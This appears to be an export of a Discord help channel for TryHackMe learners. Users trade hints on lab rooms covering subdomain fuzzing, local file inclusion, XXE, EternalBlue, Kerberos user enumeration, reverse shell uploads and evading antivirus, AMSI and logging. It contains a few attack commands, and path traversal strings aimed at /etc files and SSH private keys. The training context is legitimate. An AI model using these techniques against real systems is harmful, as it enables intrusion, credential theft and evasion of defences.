hi guys. with the subdomain enumeration room, I'm struggling to find the two subdomains. I'm using acmeitsupport.thm in the url flag, but it doesn't give me anything.

Can we see your command?

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://acmeitsupport.thm -fs 472

I havent used this namelist.txt before but i used subdomains.....-5000.txt and it worked for me

The only reason I'm using that namelist is that's the one that they tell me to use in the exercise. I'll try the subdomains one. Thanks

Gave +1 Rep to @cold eagle

And i believe that you have added the IP and domain name in your hosts file

You have added? @jade island

My apologies. I hadn't started the machine 🤭

I actually started with this task yesterday, and didn't realise that I left the machine running, so it obviously terminated. forgive me

thank you for the help.

It's probably best you don't spam multiple channels.

Hey all, I've come across an issue during my engagement on Relevant. Two of the SMB shares (IPC$ and nt4wrksv) are open so that doesn't require credentials to access.

According to many walkthroughs (I hated checking them out cuz I wanted to do it all by myself) Machine is supposed to be vulnerable to MS17-010 (Eternal Blue), which I confirmed from the Nmap vuln scanning but doesn't seem to be working when tested out with various exploits found online such as AutoBlue, zzz_exploit.py, etc. They all kinda led to ACCESS DENIED. I tried to open up the exploit and see what's going on but no luck..

Can someone tell me what's going on? Let me know if you need some more info

can you anyone give the hint of Pickle Rick room

I have done ports scan and directory listing

I've had this exact same issue

never got an answer... it drove me literally insane

it's out of scope but it supposed to be vulnerable.

Antivirus, perhaps. It's still a mystery to me

it could be Antivirus... dunno

yes I found login page

Hey, I totally understand that. Its been over 4 hours that I've been trying real hard to figure out what the fuc kis going on and yeah It is really driving me insane. I just decided to opt out to the port 49664 the smb share mirroring and execute the aspx payload.

yeah, some boxes (unless you're an expert) you just have to stay in scope and do more research.

it finally made sense in another room, where i tried to RCE myself a shell and i actuallywitnessed the AV warning. It was also out -of-scope.

.
I can't say for sure. Maybe try getting RDP and then run the exploit again, see if AV flags it, so you're not totally blind

lassi pointed me to "amsi bypass". still haven't gotten around to trying it.

that's something i haven't found on thm tho, so you might have to look elsewhere

this one has it too but it's pretty advanced/complex stuff
https://tryhackme.com/room/runtimedetectionevasion

knew I saw it in another room

Man it is totally possible that AV is messing things up. I will try get a foodhold first and check on the defender and AV. Thanks for lighting my mind up. I was just completely clueless & pissed lol

Gave +1 Rep to @trim badger

Hello i am really struggling with a the
"Why are NULL, FIN and Xmas scans generally used?" question in task 8 of the nMap room i feel like i just mess up the typing or something dumb like that but i spent over half an hour on this single question and just want to progress.🥲 😅 Can someone tell me where to look or something?

In this text.

oke i will have a look again thank you. lets hope i won't be back in half an houre xD

||Paragraph 3 ||

i found it thank's 🙂 I was trying so many ways of typing "are used primarily as they tend to be even stealthier" xD @lucid junco

Oi, Robocop, where is my rep.

The number of * is a clue to how long the answer is.

+rep @lucid junco

Gave +1 Rep to @lucid junco

hi I need a hint for challenge 2 of LFI room

in last section

I found that I can see file content preview by modifying value of cookie

what have you tried so far???

because to shadow it sounds like you should already have all the info and knowledge of what to do to get said flag

I am just modifying value box and putting in things like ..//etc//flag2

so I'm playing around with file previews

why the double slashes???

I tried both with and without double slashes

you might need to jump up more then just a single dir too

I am doing that

I just jumped three directories and its still not letting me

do I just play around with the directories?

I got it

I found it

nevermind

||/var/www/html/something||

YAY good job on getting the flag

lol

thanks

I think I just need to get my head in the right direction

once I get my brain going I should be fine

lol I'm glad there's a community like this one

ok

yeah it is great isent it

ya

I am having trouble with challenge 3. Lol, LFIs are hard.

could you please give me a hint as to I researched $_REQUEST which turns out the be a way to take HTML input

I tried inserting $_REQUEST[../../../etc/flag] into input box

I also tried going into inspector and modifying the GET request in the form to see if I could get the flag

it turns out that I get an error message:

could someone give me a hint without giving me the answer?

I tried using quotations in the $_REQUEST['../../../etc/flag3']

am I overthinking it?

I used curl with POST request. Can you try the same?

Can I get a hint for Severity 9 - Lab in OWASP top 10? I've spent over one hour just searching for random stuff on exploitDB and have found nothing that can remotely work

See the source code? And navigate through links?

I mean, I see that there's an admin.php page that accepts in a form. My guess is that I'm maybe supposed to inject something through that form?

I can also see jquery-2.1.4 is used, but exploitDB shows nothing for that specific version

see the source code of || login|| and i think you will have your answer

login.php? Hmm, that webpage doesn't exist

It's the Severity 9 - Lab (the one with the online bookstore)

https://tryhackme.com/room/owasptop10 this room right?

Yes, task 29

there is an exploit available on exploit db for unauthenticated RCE and i have checked it just now.

How were you able to find it? That's all I need 😅

I don't know what information I was supposed to find out by browsing the website to enter into exploitDB

i used simple term bookstore unauthenticated rce on google

What lead you to add "unauthenticated rce" to that search?

I mean, of all exploits, why that one specifically

there is only one exploit for RCE i think for bookstore

Oh.. I see.. searching for "bookstore" on exploitDB yields almost no results.. searching for "book store" yields much more

Yeah, I guess it was named "Book Store" in exploitDB instead of "Bookstore"... Thanks @cold eagle

Gave +1 Rep to @cold eagle

i guess you found the right exploit?

Yes. I've managed to complete the task

Wireshark: The Basics - exercise Packet Navigation question (
Go to packet 12 and read the comments. What is the answer?)

I have the image but whats the answer lol?

#993868677600514130 and you have to scroll all the way down in the comments

I was having the same problem and just now got it. I had to right click on packet 12 and then select Packet Comment, and then scroll down. That was the only way I was able to see it.

thank you

Gave +1 Rep to @raven escarp

somebody help me in Attacktive directory Room.
this error show when using the kerbrute "Couldn't find any KDCs for realm SPOOKYSEC.LOCAL0. Please specify a Domain Controller"
command: "./kerbrute_linux_amd64 userenum -v -d spookysec.local0 /home/kali/THM/attractive\ \ directory/uname.txt"

hi guys

I saw a guy earlier said to use curl with POST request

I can try that but I will have to research it

anyone able to help me if I have issues with challenge 3 of LFI?

thanks btw

Well from your screenshot you are not even on the right page.
You can't put /etc/flag as the URL

right ok I am trying to use CURL

right now

ok

I tried putting it into the input box a while ago

I'm trying to use CURL in terminal to do it. Should my efforts be on the input box or the terminal

?

I tried $_REQUEST[/etc/flag3] and it doesn't work and I have tried all sorts of other things in the input box

Well, I think you are somewhat confused about $_REQUEST, did you google what that is?
All you have to do is using the right request method to send the data and the right payload

ok

thank you tho

I googled it it's a way of sending and accepting requests

I just have to continue to research it

I will get it eventually

do I have to do something with cookies where I save a cookie in a variable and then access the cookie via the HTML?

does this video explain well enough about $_REQUEST?

https://www.youtube.com/watch?v=yNyKJZvHVIM

No it's nothing about cookies for that task

Well it's not that complicated, so I guess that video is explaining it good enough, but I'm not going to watch the video now to confirm 😄

ok

I am gonna keep going then

its something I can type in input box right?

and do I have to modify HTML in inspect element?

because those are the other things I have been doing

I have been trying typing into input box $_REQUEST[....////....////....////etc////flag3%00]

and its still not working

I also tried modifying HTML to include PHP code to get the $_REQUEST[/etc/flag3]

among other things in those categories

seems you are going down rabbit holes

I also tried echo $_REQUEST[../../../etc/flag3]

don't give me the answer but I am thinking that I am overthinking it?

I know I will solve it eventually

yeah definitely over thinking it right now

ok

I'm somewhat confused why you always write it like that $_REQUEST[../../../etc/flag3] ?
Could you show a screenshot of that?

I figured it was in the include function inherently

The $_REQUEST part is something server side, so it's nothing you have to supply.
Your part is to send your payload with the right request method.

ok

ok

so hold on

in the URL bar after the ? I type echo $_GET[../../../etc/flag3%00]

am I getting closer

I get no errors in this case but no file preview

no matter how many dotdotslashes I use it does same thing

I know $_REQUEST accepts GET and POST and COOKIE requests

all in one

am I misunderstanding it?

No, you need to understand how data is being send via a GET request and via a POST request and how the server retrieves that.
E.g. Task 4 shows you how the server side code would look like to retrieve the data sent via a GET request where the parameter name is "lang".

So your $_GET is again something server side

ok

https://www.w3schools.com/tags/ref_httpmethods.asp

ok I will read that

Ok I am gonna research that

I researched it a little bit and tried using a php wrapper and ended up with this error:

I'm gonna keep trying different wrappers

but thanks

ok

Room: Evading Logging and Monitoring, Task 10 any help ? i run the script from the desktop and then i clear the logs from the Event Viewer but i get :: Traffic halted, you got caught

Guys I need help on windows priv escalation room : https://tryhackme.com/room/windowsprivesc20 for task 7 - Abusing vulnerable software. I am not able to add pwnd user in administrator group although tried to change the payload in the exploit

hello im doing the rootme room, when i upload my reverse shell file the file wont load and the fire fox says "The connection was reset" is this becouse the website blocks the reverse shell or is something wrong with my vpn/internet settings.

what vpn are you using

got fixed had to change the mtu..

Hi everyone does any know if we are suppose to be able to access /data on the fortress box. It seems strange as the flags are listed inside

hi, I know that $_REQUEST is an array of cookies, POST requests, and GET requests

so do I need to use all three of those to solve the LFI challenge 3?

or which one of those should I focus on

I had to change request to POST request and POST ../../../etc/flag1 in the input box

ok

so I should modify it to POST request but do I need to modify a cookie as well?

nudges. ok. I am gonna keep going

thanks for the encouragement

I will keep going until I get it

thanks

If I'm stuck on LFI, is it worth it to go onto the next vulnerability and come back to LFI later?

I think that would make sense.

I can do SSRF without knowing LFI right?

I am in command panel "Pickle Rick room"
Is I'm closer

Hello, oh, I m new and I wanted to have some experience in the field of hacking, is there anyone to help me?

Closer to foothold

how I establish reverse connection

See which commands you are allowed to run.

Ànyone able to give me a nudge on lookingglass?

Where are you stuck?

The port acanning. when i connect w ssh to any port i get no matching host peints or smtu

Is that the part the says Higher/lower?

I dont see any of that haha

i get that fingerprint error

no matching hoat fongerprint or smth

What's your nmap syntax?

-sS -p- for discovering the ports

-sS -sV -p 0,1023 for scanning srvices

What out output did -sS -p- give you?

-sS -sV -p 0,1023 for scanning srvices

What output did -sS -p- give you?

hey I want some hint regarding MITRE room, task 3, last 2 ques. I can't find with which group Hikit is slightly overlaps?

I'm in the year of the dog room.
:-; guys any hints on how to bypass the filters for '<' ,etc for uploading reverse shell payload

not done that room but you can probably use the normal pipe char right???

i didnt get what ur trying to say. I tried converting into hex, It didn't work.

somecommand here | a command that saves it as a file

where do i pipe it from

lemee see. the php code uses strstr for the check so I cannot directly pass text through

but shadow dunno if you have basic command execution on the box or not already

lassi can probably help better

also if you want someone to blame for making the room to hard think this is one of muiri:s rooms

the worst part is I tried I couldn't get it to execute any commands but could load files and create em. kinda weak at sql. I tried using smb but idk i couldn't get it to work today.

yea If only I could execute curl. lemme see.

huhhhhhhhhh, kinda feeling like a stupid. now. wow. I tried earlier converting to hex. It didn't work. Now it works. 0-0

Any hints on the 2 last challenges on room Password Attacks?

In the Athem Room CTF - Task 2: How did you inspect the pages to identify Flag 1 ?

Curl the meta data.

Thanks @lucid junco I have not used much. I will read up 🙂

Gave +1 Rep to @lucid junco

Burpsuite - Intruder - Task 10. Don't really need any help here. I'm wondering why success and fail have different sizes? What type of contents do they return?

do a fun test and visit one of the failed pages and then visit one of the successfully found pages

then count the lines of text

Oh wow... That's really simple.. Thanks 😄

Gave +1 Rep to @alpine kestrel

no problem and also probably makes it very clear why it works that way..

Heydee oh o/
Not sure if I'm in the right place to ask for this but I'm doing the Web enumeration's room and start to learn how to use gobuster. I was wondering something about files enumeration : does the -x flag must have specifics extensions called or is there a way to ask for enumerating any files in the specified directory ? (like using .* or something like that).
Thanks in advance for your time.

Yes, ok, I think I understand now. I'm trying to use gobuster like if I was on my own hard drive launching a simple ls command...but that's not how it works.

One more time (and certainly not the last 😁 ), thanks for your answer 👍

Gave +1 Rep to @burnt rivet

hi do I need LFI in order to do SSRF?

I'm thinking of coming back to LFI later

because I got stuck

I'm thinking of doing SSRF and some other challenges and then going back and doing LFI

yes SSRF is going good

I will get back to LFI/RFI when I complete rest of web fundamentals path

ok

cool

I'm gonna do other web fundamentals and get back to LFI

I think I just need to take a break from LFI and then redo it

Hmm, 🤪 any hints for alice. :-; I'm into humptydumpty acccount and I'm lost. I tried creating a dictionary out of the text and use hydra. but idk

in the looking glass room

nvm i got in 😮

hlo hackers
I am in "Kenobi Room"
when I mount /var directory it does not show kenobi's private key

nice 🙂

I check all the directories but doesn't show private key
how do i get in

ah man, you edited it the joke is lost now

haaaahhh

can you show the command you used for mounting?

I have successfully mounted

if you did, you'd have files wouldn't ya

I think you should try this room

he is done with the room

sorry, you've no idea how funny that is

@tardy tapir i hope you did this?

Hi there, I've got another question about Gobuster, just to understand how it works : I noticed that between a directory enumeration and file extension with only one extension after the -x flag, the number of the keyword for the search is doubled. Is it because gobuster look for "word_from_list.my_extension" and "**.**word_from_list.my_extension" ? (for the hidden ones)

In the room, it's shown using -x.txt,.php etc. But I think it's even, because I also tried -x txt and it works (as it's shown in the summary after launching the command with the "Extension" line).

Yes, I got that, but I was wondering why suddenly the wordlist is passed twice ?...

Because it's using the word without extension and one time with extension

Hi y'all I am stuck on MITRE engage Task 5 Question 2... I used the hint but still cannot figure out which 'resource aid' is used.

Ooooh, it's obvious now I'm reading that 🤦‍♂️ Thanks to you both 👍

Gave +1 Rep to @left thunder

• @burnt rivet

Gave +1 Rep to @burnt rivet

Any luck with this task?

Backup files generally have the extension .bak

Hi. I'm doing the room Hashing - Crypto 101 and I'm confused on the last question in task 2. Can anyone provide me a good source of information for this question? The question is "If you have an 8 bit hash output, how many possible hashes are there?"

https://en.wikipedia.org/wiki/Hash_collision

https://freemanlaw.com/hash-collisions-explained/

2 different inputs give them same output.

need some help with the upload vurnerabilities room, last challenge. I uploaded the file while evading the filters, and scanned content on the location that keeps the files. Only gobuster gave nothing back

why are you scanning only in the content folder???

hahaha

oh thanks for that confirmation lassi.... was a while since shadow did that room so don't recall everything

Gave +1 Rep to @burnt rivet

helloooo

I'm doing owasp top 10 and am stuck at XXE

I should find the path in which ssh keys are stored from specific user by using XXE

how can I list files or can I do something similar to find out?

which task number?

task 16, 4th question

I just don't know the last part of the location

I think it is /home/<user>/.ssh/???

you have to make a payload that reads /etc/passwd

yep

ooh id_rsa right?

yeeeeeaaah

thanks to both of you!

yeah

so about the payloads with SYSTEM in it, I can only read the contents of the files?

and then id_rsa.pub tends to give you the username

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE Injection

nice, thanks!